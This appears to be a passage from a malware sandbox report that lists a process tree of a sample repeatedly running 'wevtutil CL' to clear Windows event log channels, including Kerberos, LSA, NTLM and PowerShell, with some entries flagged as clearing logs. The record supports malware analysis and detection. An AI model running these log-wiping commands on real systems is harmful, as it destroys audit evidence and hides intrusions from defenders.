C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"
2⤵
PID:1296

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-KdsSvc/Operational"
2⤵
- Clears Windows event logs
PID:4988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kerberos/Operational"
2⤵
PID:4364

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"
2⤵
PID:3760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/General"
2⤵
PID:4372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/Performance"
2⤵
PID:3380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
2⤵
PID:2600

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Debug"
2⤵
PID:4064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Operational"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"
2⤵
PID:1152

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Operational"
2⤵
PID:4160

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
2⤵
PID:5036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"
2⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"
2⤵
PID:2700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"
2⤵
PID:4964

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"
2⤵
PID:464

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-IO/Operational"
2⤵
PID:2184

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
2⤵
PID:4248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
2⤵
PID:4060

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Analytic"
2⤵
PID:2444

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Operational"
2⤵
PID:3692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"
2⤵
PID:2660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"
2⤵
- Clears Windows event logs
PID:4896

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Pdc/Diagnostic"
2⤵
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Pep/Diagnostic"
2⤵
PID:2764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
2⤵
PID:292

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration"
2⤵
PID:400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
2⤵
PID:448

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
2⤵
PID:3872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
2⤵
PID:1828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
2⤵
PID:1556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"
2⤵
PID:3296

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
2⤵
PID:4880

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"
2⤵
PID:2876

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
2⤵
PID:3020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"
2⤵
PID:2992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
2⤵
PID:2056

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"
2⤵
PID:3244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Performance"
2⤵
- Clears Windows event logs
PID:4940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Debug"
2⤵
PID:4288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
2⤵
PID:1704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Operational"
2⤵
PID:752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"
2⤵
PID:4888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"
2⤵
PID:3752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"
2⤵
PID:388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"
2⤵
PID:552

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"
2⤵
PID:3284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"
2⤵
PID:2516

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"
2⤵
PID:4536

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Kernel-XDV/Analytic"
2⤵
PID:2132

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Admin"
2⤵
PID:1996

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Operational"
2⤵
- Clears Windows event logs
PID:3572

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Performance"
2⤵
PID:4868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Known Folders API Service"
2⤵
PID:3796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"
2⤵
PID:624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"
2⤵
PID:4780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LSA/Diagnostic"
2⤵
PID:4804

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LSA/Operational"
2⤵
PID:1960

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LSA/Performance"
2⤵
PID:4252

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
2⤵
PID:4636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"
2⤵
PID:3480

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"
2⤵
PID:1360

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"
2⤵
PID:2720

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LimitsManagement/Diagnostic"
2⤵
PID:2656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
2⤵
PID:5008

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
2⤵
PID:612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LiveId/Analytic"
2⤵
PID:2628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-LiveId/Operational"
2⤵
PID:396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
2⤵
PID:968

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"
2⤵
PID:4844

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"
2⤵
PID:3948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSFTEDIT/Diagnostic"
2⤵
PID:2856

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"
2⤵
PID:1172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"
2⤵
PID:2000

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"
2⤵
PID:4952

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Admin"
2⤵
PID:3628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Analytic"
2⤵
PID:3580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Debug"
2⤵
PID:4376

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MUI/Operational"
2⤵
PID:3840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMC"
2⤵
PID:2836

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMR"
2⤵
PID:212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Media-Streaming/MDE"
2⤵
PID:904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
2⤵
PID:2484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
2⤵
PID:1096

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
2⤵
PID:2804

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
2⤵
PID:4908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
2⤵
PID:2164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
2⤵
PID:3620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
2⤵
PID:2872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Minstore/Analytic"
2⤵
PID:4860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Minstore/Debug"
2⤵
PID:3744

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
2⤵
PID:4808

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
2⤵
- Clears Windows event logs
PID:2208

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
2⤵
PID:2796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
2⤵
PID:2032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
2⤵
PID:3636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"
2⤵
PID:1400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
2⤵
PID:4140

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
2⤵
PID:2672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
2⤵
PID:4988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
2⤵
PID:4364

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Mprddm/Operational"
2⤵
PID:3760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"
2⤵
PID:4372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NCSI/Operational"
2⤵
PID:3380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
2⤵
PID:2276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
2⤵
PID:2548

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"
2⤵
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NDIS/Operational"
2⤵
PID:220

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NTLM/Operational"
2⤵
PID:2512

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"
2⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"
2⤵
PID:2700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ncasvc/Operational"
2⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Diagnostic"
2⤵
PID:2324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Operational"
2⤵
PID:1312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NdisImPlatform/Operational"
2⤵
PID:4992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ndu/Diagnostic"
2⤵
PID:4752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetShell/Performance"
2⤵
PID:4580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Network-Connection-Broker"
2⤵
PID:3736

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Network-DataUsage/Analytic"
2⤵
PID:3832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Network-Setup/Diagnostic"
2⤵
PID:4904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
2⤵
PID:2660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkBridge/Diagnostic"
2⤵
PID:1160

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"
2⤵
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"
2⤵
PID:2764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"
2⤵
PID:292

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProvider/Operational"
2⤵
PID:400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Analytic"
2⤵
PID:448

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Operational"
2⤵
PID:3872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkSecurity/Debug"
2⤵
PID:1828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NetworkStatus/Analytic"
2⤵
PID:4312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"
2⤵
PID:284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
2⤵
PID:1620

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"
2⤵
PID:4944

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"
2⤵
PID:2104

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ntfs/Operational"
2⤵
PID:3756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ntfs/Performance"
2⤵
PID:2056

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Ntfs/WHC"
2⤵
PID:3244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OLE/Clipboard-Performance"
2⤵
PID:4940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"
2⤵
PID:4288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"
2⤵
PID:1704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
2⤵
PID:752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
2⤵
PID:4888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
2⤵
PID:3752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Operational"
2⤵
PID:388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
2⤵
PID:4400

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OcpUpdateAgent/Operational"
2⤵
PID:2592

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"
2⤵
PID:2496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"
2⤵
PID:1948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"
2⤵
PID:4696

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"
2⤵
PID:5052

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OneBackup/Debug"
2⤵
PID:1164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"
2⤵
PID:3656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OneX/Operational"
2⤵
PID:1900

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"
2⤵
PID:764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-OtpCredentialProvider/Operational"
2⤵
PID:2560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"
2⤵
PID:2336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Analytic"
2⤵
PID:4396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Debug"
2⤵
PID:2352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Operational"
2⤵
PID:4252

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"
2⤵
PID:4152

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Partition/Analytic"
2⤵
PID:4452

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Partition/Diagnostic"
2⤵
PID:4212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
2⤵
PID:2940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PerceptionRuntime/Operational"
2⤵
PID:1216

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PerceptionSensorDataService/Operational"
2⤵
PID:4508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
2⤵
PID:512

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
2⤵
PID:4624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
2⤵
PID:2704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
2⤵
PID:3188

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
2⤵
- Clears Windows event logs
PID:4116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
2⤵
PID:3460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
2⤵
PID:4832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
2⤵
PID:1688

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
2⤵
PID:3344

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PhotoAcq/Analytic"
2⤵
PID:4756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PlayToManager/Analytic"
2⤵
PID:4392

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Policy/Analytic"
2⤵
- Clears Windows event logs
PID:3628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Policy/Operational"
2⤵
PID:1336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
2⤵
PID:3156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
2⤵
PID:4840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
2⤵
PID:4600

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"
2⤵
PID:1352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"
2⤵
PID:1320

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
2⤵
PID:3652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
2⤵
PID:4024

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
2⤵
PID:2804

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
2⤵
PID:1004

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Admin"
2⤵
PID:1780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"
2⤵
PID:4588

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Debug"
2⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"
2⤵
PID:5044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"
2⤵
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintBRM/Admin"
2⤵
PID:2208

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService-USBMon/Debug"
2⤵
PID:2796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Admin"
2⤵
PID:4244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Debug"
2⤵
PID:4604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PrintService/Operational"
2⤵
PID:4552

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Privacy-Auditing/Operational"
2⤵
PID:3164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ProcessStateManager/Diagnostic"
2⤵
PID:3636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
2⤵
PID:4924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
2⤵
PID:384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
2⤵
PID:440

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
2⤵
PID:2116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
2⤵
PID:2156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Diagnostic"
2⤵
PID:3004

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Informational"
2⤵
- Clears Windows event logs
PID:3676

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Proximity-Common/Performance"
2⤵
PID:3036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PushNotification-Developer/Debug"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PushNotification-InProc/Debug"
2⤵
PID:2952

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Admin"
2⤵
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Debug"
2⤵
PID:220

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Operational"
2⤵
PID:5036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"
2⤵
PID:5068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"
2⤵
PID:2700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"
2⤵
PID:4912

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC/Debug"
2⤵
PID:2324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"
2⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-RRAS/Debug"
2⤵
PID:1312

